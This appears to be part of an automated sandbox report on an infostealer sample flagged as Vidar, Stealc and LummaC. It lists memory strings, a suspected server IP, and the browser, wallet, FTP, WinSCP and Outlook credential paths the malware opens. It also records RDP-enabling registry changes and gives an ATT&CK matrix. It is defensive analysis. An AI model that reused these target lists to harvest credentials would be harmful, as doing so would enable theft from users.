Source: RegAsm.exe	String found in binary or memory: \Ethereum\
Source: RegAsm.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: RegAsm.exe, 00000004.00000002.2536324223.000000000138D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: 147.45.44.104lfons\AppData\Roaming\Binance\.finger-print.fp
Source: RegAsm.exe	String found in binary or memory: Ethereum
Source: RegAsm.exe	String found in binary or memory: file__0.localstorage
Source: RegAsm.exe	String found in binary or memory: \Coinomi\Coinomi\wallets\
Source: RegAsm.exe	String found in binary or memory: \Exodus\exodus.wallet\
Source: RegAsm.exe	String found in binary or memory: ge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|
Source: RegAsm.exe	String found in binary or memory: us\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|M
Source: RegAsm.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: RegAsm.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core			Jump to behavior

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-wal	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-shm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-wal	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\backups\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004	Jump to behavior

Source: Yara match	File source: 0000000A.00000002.2967028725.00000000005A1000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 5280, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 528, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 8188, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: 17.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000011.00000002.2350258097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2230154118.0000000003D85000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Stealc

Source: Yara match	File source: 4.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.3a65570.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.3a65570.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2070552431.0000000003A65000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2536324223.000000000132A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2534365858.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 5280, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: 7.2.userAFHDHCAAKE.exe.3945570.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.userAFHDHCAAKE.exe.3945570.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000002.2971689518.00000000011C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2967028725.00000000005A1000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2211440894.0000000003945000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2971689518.0000000001230000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2967028725.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 5280, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: userAFHDHCAAKE.exe PID: 7136, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 528, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 8188, type: MEMORYSTR

Allows multiple concurrent remote connection

Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe

Registry key created or modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Terminal Server\Licensing Core EnableConcurrentSessions

Enables remote desktop connection

Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe

Registry key created or modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Terminal Server fDenyTSConnections

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C490C40 sqlite3_bind_zeroblob,	4_2_6C490C40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C490D60 sqlite3_bind_parameter_name,	4_2_6C490D60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C3B8EA0 sqlite3_clear_bindings,	4_2_6C3B8EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C490B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob,	4_2_6C490B40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C3B6410 bind,WSAGetLastError,	4_2_6C3B6410
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_2003E090 sqlite3_bind_int64,sqlite3_bind_value,sqlite3_step,sqlite3_reset,	10_2_2003E090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_2004E170 sqlite3_bind_int64,sqlite3_step,sqlite3_reset,	10_2_2004E170
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_2003E200 sqlite3_initialize,sqlite3_free,sqlite3_bind_int64,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,	10_2_2003E200
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_1FFE5C70 sqlite3_prepare_v3,sqlite3_bind_int64,sqlite3_step,sqlite3_column_value,sqlite3_result_value,sqlite3_reset,	10_2_1FFE5C70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_2004A6F0 sqlite3_mprintf,sqlite3_mprintf,sqlite3_mprintf,sqlite3_free,sqlite3_bind_value,	10_2_2004A6F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_2002EF30 sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_result_error_code,	10_2_2002EF30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_20093770 sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,	10_2_20093770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_1FFE4820 sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_reset,sqlite3_initialize,	10_2_1FFE4820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_200B37E0 sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,	10_2_200B37E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_20007810 sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_value,sqlite3_step,sqlite3_reset,	10_2_20007810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_1FFF8680 sqlite3_mprintf,sqlite3_mprintf,sqlite3_initialize,sqlite3_finalize,sqlite3_free,sqlite3_mprintf,sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_int64,	10_2_1FFF8680
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_200B4140 sqlite3_bind_int64,sqlite3_step,sqlite3_column_bytes,sqlite3_column_blob,sqlite3_initialize,sqlite3_reset,sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,	10_2_200B4140
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_20048200 sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_bind_int64,sqlite3_step,sqlite3_column_int,sqlite3_reset,	10_2_20048200
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_20008430 sqlite3_bind_int64,	10_2_20008430
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_20028550 sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_reset,	10_2_20028550
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_200206E0 sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,	10_2_200206E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_20008970 sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob,	10_2_20008970
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_1FFFB400 sqlite3_mprintf,sqlite3_mprintf,sqlite3_free,sqlite3_bind_value,sqlite3_reset,sqlite3_step,sqlite3_reset,sqlite3_column_int64,	10_2_1FFFB400
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_20008CB0 sqlite3_bind_zeroblob,	10_2_20008CB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_200B4D40 sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_reset,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_free,	10_2_200B4D40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_20000FB0 sqlite3_result_int64,sqlite3_result_double,sqlite3_result_int,sqlite3_prepare_v3,sqlite3_bind_int64,sqlite3_step,sqlite3_column_value,sqlite3_result_value,sqlite3_reset,	10_2_20000FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_20069090 sqlite3_reset,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_errmsg,sqlite3_mprintf,	10_2_20069090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_200751D0 sqlite3_mprintf,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,	10_2_200751D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_2008D3B0 sqlite3_bind_int64,sqlite3_step,sqlite3_reset,	10_2_2008D3B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_200F14D0 sqlite3_bind_int64,sqlite3_log,sqlite3_log,sqlite3_log,	10_2_200F14D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_200FD4F0 sqlite3_bind_value,sqlite3_log,sqlite3_log,sqlite3_log,	10_2_200FD4F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_200755B0 sqlite3_bind_int64,sqlite3_step,sqlite3_reset,	10_2_200755B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_200AD610 sqlite3_free,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,	10_2_200AD610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_20075910 sqlite3_mprintf,sqlite3_bind_int64,	10_2_20075910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_1FFE66C0 sqlite3_mprintf,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_null,sqlite3_bind_blob,sqlite3_bind_value,sqlite3_free,sqlite3_bind_value,sqlite3_step,sqlite3_reset,	10_2_1FFE66C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_200FD9E0 sqlite3_bind_int64,sqlite3_log,sqlite3_log,sqlite3_log,sqlite3_bind_int64,sqlite3_log,sqlite3_log,sqlite3_log,	10_2_200FD9E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_2004DB10 sqlite3_initialize,sqlite3_bind_int64,sqlite3_step,sqlite3_column_bytes,sqlite3_column_blob,sqlite3_reset,sqlite3_free,sqlite3_free,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_free,	10_2_2004DB10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_2004DFC0 sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_mprintf,sqlite3_bind_text,sqlite3_step,sqlite3_reset,	10_2_2004DFC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_20051FE0 sqlite3_mprintf,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,	10_2_20051FE0

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	3 Windows Management Instrumentation	1 LSASS Driver	1 LSASS Driver	211 Disable or Modify Tools	2 OS Credential Dumping	2 System Time Discovery	2 Remote Desktop Protocol	11 Archive Collected Data	12 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	21 Native API	1 DLL Side-Loading	1 DLL Side-Loading	111 Deobfuscate/Decode Files or Information	1 Credentials in Registry	1 Account Discovery	Remote Desktop Protocol	4 Data from Local System	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 PowerShell	1 Create Account	2 Windows Service	41 Obfuscated Files or Information	Security Account Manager	5 File and Directory Discovery	SMB/Windows Admin Shares	1 Screen Capture	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	2 Windows Service	511 Process Injection	12 Software Packing	NTDS	177 System Information Discovery	Distributed Component Object Model	1 Email Collection	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Timestomp	LSA Secrets	261 Security Software Discovery	SSH	Keylogging	124 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	141 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	23 Masquerading	DCSync	12 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
